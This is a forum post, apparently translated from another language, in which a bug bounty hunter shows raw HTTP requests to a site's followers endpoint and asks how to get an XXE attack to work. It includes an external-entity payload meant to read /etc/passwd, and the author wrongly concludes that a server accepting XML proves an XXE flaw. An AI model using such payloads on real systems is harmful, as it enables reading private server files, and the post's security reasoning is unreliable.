我是一名黑客,现在我正在寻找安全漏洞(错误)以获得赏金。昨天,当我在一个网站上寻找 bug 时,我看到一个这样的请求:
POST /accounts/28605113/followers HTTP/1.1
Host: example.com
Connection: close
Content-Length: 19
Accept: */*
Origin: https://example.com
X-CSRF-Token: ch0+kD67DYFab7FmEeAn1RDh6DZUmI65S+K9CxuKTvg=
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: https://example/watch/search?q=hackerone
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,vi;q=0.8
Cookie: my_cookies
account_id=28605113
我正在考虑测试 XXE:
POST /accounts/28605113/followers HTTP/1.1
Host: example.com
Connection: close
Content-Length: 19
Accept: */*
Origin: https://example.com
X-CSRF-Token: ch0+kD67DYFab7FmEeAn1RDh6DZUmI65S+K9CxuKTvg=
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Type: text/xml; charset=UTF-8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: https://example.com/watch/search?q=hackerone
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,vi;q=0.8
Cookie: my_cookies
<?xml version="1.0" encoding="UTF-8"?>
<account_id>28605113</account_id>
太棒了!有用!我通过使用 XML 内容被新用户关注 ====> XXE 漏洞
然后我决定通过这个请求来利用它:
POST /accounts/28605113/followers HTTP/1.1
Host: example.com
Connection: close
Content-Length: 19
Accept: */*
Origin: https://example.com
X-CSRF-Token: ch0+kD67DYFab7FmEeAn1RDh6DZUmI65S+K9CxuKTvg=
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Type: text/xml; charset=UTF-8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: https://example.com/watch/search?q=hackerone
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,vi;q=0.8
Cookie: my_cookies
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><account_id>&xxe;</account_id>
但我只是得到这样的回应:
HTTP/1.1 200 OK
Server: openresty
Content-Type: text/html; charset=utf-8
Strict-Transport-Security: max-age=31536000
X-Frame-Options: SAMEORIGIN
X-UA-Compatible: IE=Edge,chrome=1
ETag: "b326b5062b2f0e69046810717534cb09"
Set-Cookie: _example_session_id=7e9aa24785793d803b3917a45377b0cb; path=/; expires=Sun, 15-Dec-2019 13:01:05 GMT; HttpOnly
Set-Cookie: __cu_id=28945505; domain=.example.com; path=/; expires=Sun, 15-Dec-2019 13:01:05 GMT
Set-Cookie: __cu_short_name=; path=/; expires=Sun, 15-Dec-2019 13:01:05 GMT
Set-Cookie: __cu=%7B%22initial%22%3A%22%26%22%2C%22mixpanel_id%22%3A%2216e9cc289603ab-0a7935d33e069a-2393f61-15f900-16e9cc289614cb%22%2C%22created_at%22%3A1574588876%2C%22days_since_creation%22%3A0%2C%22plan_info%22%3A%7B%22id%22%3A-1%2C%22type%22%3A10%7D%2C%22features_with_plan%22%3A0%2C%22trial_info%22%3Anull%2C%22picture%22%3A%7B%22thumb_url%22%3Anull%7D%2C%22authorizationToken%22%3A%22b0128945505............................4bd802ced0b90c02e9c75e6284c87a32........................................1574588876164...........1574761676164...........YugborL0iXfMQ7sZDP2GWw%7E%7E00000000000000....................................%22%2C%22authorizationTokenExpiresAt%22%3A%222019-11-26T09%3A47%3A56.172Z%22%2C%22timezone%22%3A%22Asia%2FHo_Chi_Minh%22%7D; path=/; expires=Sun, 15-Dec-2019 13:01:05 GMT
X-Request-Id: 9439a64c3fcbe97f7c061c68f35b6f79
X-Runtime: 0.432708
Content-Length: 4
Date: Sun, 24 Nov 2019 13:01:05 GMT
Connection: close
X-Served-By: cache-jfk8121-JFK, cache-hkg17925-HKG
X-Cache: MISS, MISS
X-Cache-Hits: 0, 0
X-Timer: S1574600465.789233,VS0,VE681
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, private, must-revalidate, max-age=0, max-stale=0, post-check=0, pre-check=0
Expires: 0
Pragma: no-cache
Age: 0
Via: 1.1 varnish
Accept-Ranges: bytes
true
没有事情发生!我要阅读的文件没有出现。唯一的事情似乎只是一个“真实”的回应。看起来我的 XXE 有效载荷不起作用。我尝试了很多但它仍然不起作用,没有任何反应,只是那个简单的响应。有没有黑客知道如何利用它,请帮助我,我会非常感谢你!(如果英语不好,请见谅)